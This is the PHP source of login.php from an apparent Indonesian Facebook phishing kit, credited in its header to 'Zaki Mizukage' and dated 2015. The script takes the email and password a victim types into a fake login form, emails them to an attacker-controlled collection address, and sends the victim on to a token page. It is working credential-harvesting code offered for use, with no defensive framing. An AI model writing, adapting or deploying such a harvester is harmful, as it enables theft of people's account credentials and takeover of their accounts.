View file login.php

File size: 898B
<?php
#-----------------------------------------------------#
# Saya menemukan script ini di blognya maste sam
# Karena saya rasa script ini masih berantakan
# Saya memperbaiki script ini
#
# Nama : Fuck Likelo.zip
# By : Zaki Mizukage
# Blog : www.Jecky.Pun.Bz
# Tanggal : 17 Agustus 2015
# 
#-----------------------------------------------------#
/* SEBAGAI RASA TERIMA KASIH, JANGAN GANTI COPYRIGHT NYA YA SAYANG */

$subjek = 'Paket Facebook Nyasar';
$mailto = 'tumbal@cpanelx.ga'; 


$username = $_POST['email'];
$password = $_POST['pass'];




$body = <<<EOD
<br><hr><br>

Email : <font color="green">$username</font> <br>
Password : <font color="red">$password</font> <br>
EOD;


$headers = "From: Zaki Mizukage\r\n"; 
$headers .= "Content-type: text/html\r\n"; 
$success = mail($mailto, $subjek, $body, $headers); 
?>
<?php
$random = rand(1000,5000);

header('location:/token.php');



?>